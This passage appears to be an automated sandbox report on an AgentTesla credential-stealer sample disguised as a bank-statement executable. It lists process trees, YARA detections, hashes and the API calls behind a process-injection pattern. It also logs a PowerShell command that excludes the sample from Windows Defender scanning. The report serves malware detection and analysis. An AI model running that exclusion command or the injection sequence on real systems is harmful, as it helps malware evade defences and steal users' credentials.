                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1238568331.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0xc10000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Users\user\Desktop\hesaphareketi-.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\hesaphareketi-.exe"
                                          Imagebase:0x5f0000
                                          File size:661'504 bytes
                                          MD5 hash:C96C8178B1018515D4B43E614A3E3F15
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3671471193.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3684663995.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3684663995.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Target ID:5
                                          Start time:03:19:49
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff75da10000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:19:51
                                          Start date:27/06/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff7fb730000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                            Execution Graph

                                            Execution Coverage:10.4%
                                            Dynamic/Decrypted Code Coverage:98.9%
                                            Signature Coverage:0%
                                            Total number of Nodes:270
                                            Total number of Limit Nodes:9

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "$"$"$"$"$"$"$0$0$0$1$1$1$1$1$1$1$9$n$n$n$|$|
                                            • API String ID: 0-2245056881
                                            • Opcode ID: d8e208973bed5a41a295023df08c1a529ea000a359d66f997ab65dfe0d7bbfe7
                                            • Instruction ID: 74d2228cd02a9647ccbac0b421846067857eb786153ea790b94772d23a6db813
                                            • Opcode Fuzzy Hash: d8e208973bed5a41a295023df08c1a529ea000a359d66f997ab65dfe0d7bbfe7
                                            • Instruction Fuzzy Hash: 4A332830A10719CFCB65DF34C859A99B7B2FF89304F5085A9E14AAB361DB31AE85DF40

                                            Control-flow Graph

                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: "$"$"$"$"$"$"$0$0$0$1$1$1$1$1$1$1$9$n$n$n$|$|
                                            • API String ID: 0-2245056881
                                            • Opcode ID: 4018f982a558dcabb32bb60bc6d804d23eefdb5e8d32398d9cc0bac0c2848767
                                            • Instruction ID: d37eac48a31ec6096f47d6c0b9fb6666d9eba8334d218a014a312353e810827a
                                            • Opcode Fuzzy Hash: 4018f982a558dcabb32bb60bc6d804d23eefdb5e8d32398d9cc0bac0c2848767
                                            • Instruction Fuzzy Hash: 59332830A10719CFCB65DF34C859A99B7B2FF89304F5085A9E14AAB361DB31AE85DF40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$LRq$\sq
                                            • API String ID: 0-3677092283
                                            • Opcode ID: 995e7bce323e76e314240aadcad71ef5a38e2233d78c646c2a16cbae80da9332
                                            • Instruction ID: fef44899c6d80bb937c1eb9efef3f3bb51b36fb1d94d2637e270d2f4769a9463
                                            • Opcode Fuzzy Hash: 995e7bce323e76e314240aadcad71ef5a38e2233d78c646c2a16cbae80da9332
                                            • Instruction Fuzzy Hash: 52828D31A152198FCB14DF69D880AADBBF2BF88301F59C569E016EB355D734E942CF90

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LRq$\sq
                                            • API String ID: 0-576302416
                                            • Opcode ID: 184e83da027e8fb50aa9e538012bff4c36437863a986d2ae109a3617da059e5f
                                            • Instruction ID: 4d12195ff00ef9ecb0a968423c38f99ebeb2956a2da0bf9eae0f43419888a3d8
                                            • Opcode Fuzzy Hash: 184e83da027e8fb50aa9e538012bff4c36437863a986d2ae109a3617da059e5f
                                            • Instruction Fuzzy Hash: 9DD17C35A152298FDB14DF69D840AAEB7F2BFC8310F16C529E416EB354DB34A906CF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Teq
                                            • API String ID: 0-1098410595
                                            • Opcode ID: d70e697a093eeef5b7a29eb0a03a06c48ec142f0f152cfedd726519fb1c6da55
                                            • Instruction ID: f98988692d69ace8ee04ebf9026178b267d1f9fa618b2fcfe846b1d297f593a1
                                            • Opcode Fuzzy Hash: d70e697a093eeef5b7a29eb0a03a06c48ec142f0f152cfedd726519fb1c6da55
                                            • Instruction Fuzzy Hash: 28412CB0D18208CFDB14CFA9D5446EEBBF6BF8A300F14942AE409AB355EB345915CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 44923476edea73dc01a4a13720a6184d1fdd7c406d75b0849bbbf63462ab1230
                                            • Instruction ID: e0dc961d63e48cce8014660abb275283b91a94129df33376f4dae1820d2c3944
                                            • Opcode Fuzzy Hash: 44923476edea73dc01a4a13720a6184d1fdd7c406d75b0849bbbf63462ab1230
                                            • Instruction Fuzzy Hash: B6523D34A003198FDB14DF24C844B99B7B2FF89314F2582A9D5596F3A2DB71AD86CF81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23946a9c95a468f6f4eab9ff90024f4a5234bdb68b3ca440d8150ee872e2c739
                                            • Instruction ID: b3a9c7bbc7b256989587c79b630b6989d69cc52dd6fff4fceb013e9e6f96cdf7
                                            • Opcode Fuzzy Hash: 23946a9c95a468f6f4eab9ff90024f4a5234bdb68b3ca440d8150ee872e2c739
                                            • Instruction Fuzzy Hash: 46524C34A003598FDB14DF28C844B99B7B2BF85314F2582E9D5586F3A2DB71AD86CF81
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1250486667.000000000A8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A8C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_a8c0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bd0bd6011086a5d201722bff63912621745591f450a34f0b42b4d23e595708eb
                                            • Instruction ID: 50e4a8d56f20d17a91af2a07d16249ff74b6704ba7734e2f554b0ff70382d9a0
                                            • Opcode Fuzzy Hash: bd0bd6011086a5d201722bff63912621745591f450a34f0b42b4d23e595708eb
                                            • Instruction Fuzzy Hash: A2C19A71710608CFDB29DB75C960BAEB7F6AF88740F15846ED146CB291EB34E902CB61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4509ae9af166de73fccd5720252390ea7fe8275fafbac5404b741930a8b32920
                                            • Instruction ID: 519ce105e680df956ecd3bd92b30617466256f438ccbc985f0f83bb25fb3fd1b
                                            • Opcode Fuzzy Hash: 4509ae9af166de73fccd5720252390ea7fe8275fafbac5404b741930a8b32920
                                            • Instruction Fuzzy Hash: 1D815B32F106298FD754DB69D880B6EB7E3AFC8710F1A8165E409EB355DE34EC019B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba279d39a7b5c0af83b23b9be4b5eea33151dd797f0e636e50f0c4ecc39f018d
                                            • Instruction ID: 3b698d0344310dc2851f002c553dd0d4b08c28e0024d1dec3ee293a26a402c4e
                                            • Opcode Fuzzy Hash: ba279d39a7b5c0af83b23b9be4b5eea33151dd797f0e636e50f0c4ecc39f018d
                                            • Instruction Fuzzy Hash: 5F611C32F106298FD754DB69C880B6EB7A3AFC8710F1AC165E409DB35ADE74EC019B91
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e223e0cf7528d28a835d2bacb4a5131636a0547c9a15809ddd9c96a7665cb1e9
                                            • Instruction ID: 2e5e97630a62dded576ea871e933067d0afbbf978e0c4705d8276c2d7e9dcca1
                                            • Opcode Fuzzy Hash: e223e0cf7528d28a835d2bacb4a5131636a0547c9a15809ddd9c96a7665cb1e9
                                            • Instruction Fuzzy Hash: 2FE0A5B4929318CBD750CF58E456AE8B7B8BB0B301F0424D6D50DA6251DB309984CE05

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-3571017164
                                            • Opcode ID: ed66b23097197a14e43bdfbd113aad2ca7a5b77769898d4ada3135d104d0e096
                                            • Instruction ID: d33b233e3887ccea36997d8e122ee522cf49cdc6a1a8f5445d915b10096a06e4
                                            • Opcode Fuzzy Hash: ed66b23097197a14e43bdfbd113aad2ca7a5b77769898d4ada3135d104d0e096
                                            • Instruction Fuzzy Hash: E9A2B974B0122A8FCB69EFA4E851BDD7771BF84300F5096D890096F269DE306E4ADF91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q$4'q
                                            • API String ID: 0-3571017164
                                            • Opcode ID: ede60c09bd9f9711f10d3b963a40e61e72995377de3a0c172d6b35ed3a1fced2
                                            • Instruction ID: 0524847403e55c57844cc65456767de8402778e319f94279d3907a79195872d6
                                            • Opcode Fuzzy Hash: ede60c09bd9f9711f10d3b963a40e61e72995377de3a0c172d6b35ed3a1fced2
                                            • Instruction Fuzzy Hash: 96A2B974B0122A8FCB69EFA4E851BDD7771BF84300F5096D890096F269DE306E4ADF91

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq$Hq
                                            • API String ID: 0-925789375
                                            • Opcode ID: 1ee97355440e70cadb49c15768f04b342533e8732faf3e4c5ea3c4567cca57df
                                            • Instruction ID: 307e0e76f748f829a8a3036ed7e5d96466dd34b322714d0308a19641a0eb84df
                                            • Opcode Fuzzy Hash: 1ee97355440e70cadb49c15768f04b342533e8732faf3e4c5ea3c4567cca57df
                                            • Instruction Fuzzy Hash: 4C814C74E003188FDF14DFA9D8546AEBBF2BF88300F54852AE419AB355DB349942DBA1

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Hq$Hq
                                            • API String ID: 0-925789375
                                            • Opcode ID: 3556ebea01ba32ce8c4966531b53e2569d7e19dfac8031eda474d7471b9f7ca6
                                            • Instruction ID: a9b493ebbcaacb6a4eb28a04839b7e69a98bd7440fc574574fc8218fde7492b0
                                            • Opcode Fuzzy Hash: 3556ebea01ba32ce8c4966531b53e2569d7e19dfac8031eda474d7471b9f7ca6
                                            • Instruction Fuzzy Hash: 12713B34B002188FCF18EBB4D598AEE77F2FF89310B2544A9E406AB361DA35DC41DB61

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1243150522.0000000005770000.00000040.00000800.00020000.00000000.sdmp, Offset: 05770000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5770000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (q$Hq
                                            • API String ID: 0-1154169777
                                            • Opcode ID: 90b129186c8be54d21b3e0f92bd74e24dc65cc3f8b416ca6b08d88db4e671b91
                                            • Instruction ID: 5d085fd14336d2bda8942275ece4e474d30c6e5d034f274c6d437d9fc64739f5
                                            • Opcode Fuzzy Hash: 90b129186c8be54d21b3e0f92bd74e24dc65cc3f8b416ca6b08d88db4e671b91
                                            • Instruction Fuzzy Hash: 0551E231B042149FDB58EF68E058BAD77A6FBC4700F1984AAD50ADB361CA34EC47D792

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0757BE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 34a84830e85e5ab1d7a49425b515658ef3fbc0ff9a8b0c78b36e249aac97b6a9
                                            • Instruction ID: 4083f6f371da68aeed16eb7bfaf3b98822a6cda7fef3adce4aeb860fd449e81d
                                            • Opcode Fuzzy Hash: 34a84830e85e5ab1d7a49425b515658ef3fbc0ff9a8b0c78b36e249aac97b6a9
                                            • Instruction Fuzzy Hash: F7915EB1D0071ACFEB24CF69D841BEDBBB2BF48310F14856AE804A7240DB759985CF91

                                            APIs
                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0757BE36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 746f79541c3106dfab438521c845ffecd1052daa7baa3979a7737d404b48ddc6
                                            • Instruction ID: d076336f540fe3a73a51c1fe13a38606e320cda6c2e09c8124127831a416aa77
                                            • Opcode Fuzzy Hash: 746f79541c3106dfab438521c845ffecd1052daa7baa3979a7737d404b48ddc6
                                            • Instruction Fuzzy Hash: 33914DB1D0071ACFEB24DF69D841BEDBBB2BF48310F14856AE808A7240DB759985CF91
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00DFD97E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: c123be22833a68645631e4a5a851a5749edd21e5690cd095290ceecfa679baa3
                                            • Instruction ID: 5109c69f1b32f0c86d935791098c9da776bb892332c0c91a699e9ea27a9b9aff
                                            • Opcode Fuzzy Hash: c123be22833a68645631e4a5a851a5749edd21e5690cd095290ceecfa679baa3
                                            • Instruction Fuzzy Hash: D2816870A00B498FD724DF29D04576ABBF2FF88304F05892DD58ACBA50D775E84ACBA1
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057342E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: d25d014035a27059f415aa4ca64db8f57835b9961b4e6cfe9e4dc03749a06c3e
                                            • Instruction ID: 8d69253ac160e3fbc995cf76fb86fc92b50b83068926bcdbcb8b4d923f3269c6
                                            • Opcode Fuzzy Hash: d25d014035a27059f415aa4ca64db8f57835b9961b4e6cfe9e4dc03749a06c3e
                                            • Instruction Fuzzy Hash: 5F51BFB1D003099FDF14CF9AD885ADEBBB6BF48310F64812AE819AB211D775A845CF90
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057342E2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 7cbf5a8f41ce8ce98f1c38b95cb0daa0804b057ec2aa43f9bd6f366190886f7a
                                            • Instruction ID: 3d57b7ddc69e500f998413c11e22c7986eed07c35b3118d701b574e0fa452ab9
                                            • Opcode Fuzzy Hash: 7cbf5a8f41ce8ce98f1c38b95cb0daa0804b057ec2aa43f9bd6f366190886f7a
                                            • Instruction Fuzzy Hash: B551C0B1D00309DFDF14CF9AC885ADEBBB6BF48310F64812AE819AB210D775A841CF90
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2deb724ffa062fd37ef077c174e15e1cb9841d5535540ec4211fde5c191a2ab5
                                            • Instruction ID: c5416562e789c9b17b478cf3a8a9cdf9faa050964ab7077572be5d90b18aa0a7
                                            • Opcode Fuzzy Hash: 2deb724ffa062fd37ef077c174e15e1cb9841d5535540ec4211fde5c191a2ab5
                                            • Instruction Fuzzy Hash: A641F071C05B5DCFDB24CBA4E4453EDBBB0EB46324F15828AC2466B259C771A906CF61
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 6d5dfb4a84a82c9872b01d2200d895e6277cb6b4c0bf65ecbf92b633cb05a504
                                            • Instruction ID: 3c4d1abe24c23043d012dddd81d6a6ec78e6de1480b4653c7d2ee0e2a5aea8f5
                                            • Opcode Fuzzy Hash: 6d5dfb4a84a82c9872b01d2200d895e6277cb6b4c0bf65ecbf92b633cb05a504
                                            • Instruction Fuzzy Hash: AC4101B1C0071DCBEB24CFA9D8847DEBBB1BF48314F20816AD508AB255DB756946CF90
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 00DF59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1237746668.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_df0000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: edfcf87d6b275ee90950f692b104ed19a69e3d5c1ea2d9cb6555e8586a551b17
                                            • Instruction ID: f10e7aa2fcfdcc6bf294e877fa6cee722e18e897e63b8f10c7b4311c2dafe162
                                            • Opcode Fuzzy Hash: edfcf87d6b275ee90950f692b104ed19a69e3d5c1ea2d9cb6555e8586a551b17
                                            • Instruction Fuzzy Hash: 3141F271C00B1DCBEB24DFA9C844B9EBBF1BF48304F20816AD509AB255DB756946CFA0
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 05736851
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1241727374.0000000005730000.00000040.00000800.00020000.00000000.sdmp, Offset: 05730000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5730000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: 195ebfa02ec7d26ac39872621a21d29d77f33764f4255b4d60000fbb51415ee1
                                            • Instruction ID: 76817b3b492c009f620641968cc59298ec6aef4670329b4bb1fee4e07bd0b573
                                            • Opcode Fuzzy Hash: 195ebfa02ec7d26ac39872621a21d29d77f33764f4255b4d60000fbb51415ee1
                                            • Instruction Fuzzy Hash: A43117B4A003059FDB14CF89C449AAABBF2FF88324F25C459D519AB322D374A841CF60
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0757BA08
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: cc88344536fee506d258c35429311ce431167eb447976bd32dbe2dfdbfecf0bb
                                            • Instruction ID: a5e68c0f1f7e7a71bbfc60d71d1e99dbe0525fdb304170f8939be99d5747fd3d
                                            • Opcode Fuzzy Hash: cc88344536fee506d258c35429311ce431167eb447976bd32dbe2dfdbfecf0bb
                                            • Instruction Fuzzy Hash: A62159B1D003199FDB10DFAAD881BEEBBF1FF48310F50842AE918A7240D7799941CBA0
                                            APIs
                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0757BAE8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1247823702.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7570000_hesaphareketi-.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: a57fd82969d2f37f23ae65efb247afaf16ae5a65ae4d2230ee2751f8bf74bf33
                                            • Instruction ID: ddeaaed903425307ce7d17f5a914f8c4afc2c2d8130dd34ba7bc267491d3465a
                                            • Opcode Fuzzy Hash: a57fd82969d2f37f23ae65efb247afaf16ae5a65ae4d2230ee2751f8bf74bf33
